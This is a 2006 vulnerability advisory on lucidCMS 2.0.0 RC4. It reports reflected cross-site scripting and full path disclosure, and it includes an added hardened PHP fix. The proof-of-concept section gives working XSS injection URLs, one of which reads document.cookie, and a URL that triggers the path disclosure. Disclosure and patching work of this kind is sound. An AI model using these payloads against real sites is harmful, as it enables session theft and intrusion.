SECURITYVULNS:DOC:12070 (Apr 04, 2006)

Multiple Vulnerabilities in LucidCMS

Author : Rusydi Hasan M
a.k.a : cR45H3R
Date : April 1st, 2006
Location : Indonesia, Cilacap

— Software description

lucidCMS is a simple and flexible content management system for
the individual or organization that wishes to manage a collection
of web pages without the overhead and complexity of other available
open source "community" CMS options.

HOME : http://lucidCMS.net
Version : 2.0.0 RC4

— The bugs

There are 2 bugs: XSS and full path disclosure.

— PoC

  1. XSS a.k.a. cross-site scripting

    Proof of concept:

    http://[victim]/[lucidcms_dir]/index.php?command=login'>[XSS_here]
    http://[victim]/[lucidcms_dir]/index.php?i18n=cs_CZ&command=panel'>[XSS_here]
    http://[victim]/[lucidcms_dir]/index.php?i18n=en_US&command=panel'>[XSS_here]

    Examples:

    http://127.0.0.1/lucidcms/index.php?i18n=en_US&command=panel'><script>alert(document.cookie)</script>

    http://127.0.0.1/lucidcms/index.php?i18n=en_US&command=panel'><h1>Bla bla bla</h1>

    http://127.0.0.1/lucidcms/index.php?command=login'><script>alert('patch your lucidCMS')</script>

    http://127.0.0.1/lucidcms/index.php?i18n=cs_CZ&command=panel'><h1>stooopidz</h1>

  2. Full path disclosure

    in /lucid_phplib/translator.php

    http://[victim]/[lucidcms_dir]/lucid_phplib/translator.php

    Warning: opendir(DIR_LANG): failed to open dir: No such file or directory in
    /var/www/html/lucidcms/lucid_phplib/translator.php on line 45

    Warning: readdir(): supplied argument is not a valid Directory resource in
    /var/www/html/lucidcms/lucid_phplib/translator.php on line 46

    Where's the problem?

    function get_languages(){
        $langs = array();
        $dir = opendir(DIR_LANG);      // <-- This is the trouble
        while($name = readdir($dir)) { // <-- and this too
            if ($name == '.' || $name == '..') continue;
            $langFile = DIR_LANG.$name.'/LC_MESSAGES/'.CONFIG_DOMAIN.'.mo';
            if (file_exists($langFile)) {
                // $GLOBALS['echoLater'][] = $langFile; // troubleshooting...
                $langs[] = $name;
            }
        }
        return $langs;
    }//get_languages
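
A hardened form of get_languages(), added here as an example and not taken from lucidCMS or from the advisory. It assumes the warnings appear because translator.php is requested directly with DIR_LANG undefined (the warning shows opendir() receiving the literal name DIR_LANG), and that PHP 7 or later is in use.

```php
<?php
// Added example, not lucidCMS code. DIR_LANG and CONFIG_DOMAIN are the
// constants used by the original function; the guard and the error
// settings below are assumptions about how the file is deployed.

// Refuse direct requests to the include file. Without the application's
// bootstrap the constants do not exist, and the failing opendir() call
// is what printed the installation path.
if (!defined('DIR_LANG') || !defined('CONFIG_DOMAIN')) {
    http_response_code(404);
    exit;
}

// Keep diagnostics out of the response body and send them to the log.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

function get_languages(): array
{
    $langs = [];

    // Check the handle before using it, so readdir() is never called
    // on a failed opendir() result.
    $dir = @opendir(DIR_LANG);
    if ($dir === false) {
        error_log('get_languages: cannot open language directory');
        return $langs;
    }

    // Strict comparison: an entry named "0" must not end the loop early.
    while (($name = readdir($dir)) !== false) {
        if ($name === '.' || $name === '..') {
            continue;
        }
        $langFile = DIR_LANG . $name . '/LC_MESSAGES/' . CONFIG_DOMAIN . '.mo';
        if (is_file($langFile)) {
            $langs[] = $name;
        }
    }
    closedir($dir);

    return $langs;
}
```

Setting display_errors to Off in php.ini covers every script at once; the per-file guard still matters because it stops the include from executing at all when fetched on its own.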

— vendor

I'm too lazy :D .

— shoutz

  1. kecoak
    (fwerd,chiko,cbug,ladybug,litherr,cybertank,cyb3rh3b,cahcephoe,scut,etc)
  2. echo staff (y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32,
    anonymous, the day)
  3. ph03n1x,ghoz,spyoff,slackX,r34d3r,xnuxer,negative,sakitjiwa

— contact

[email protected]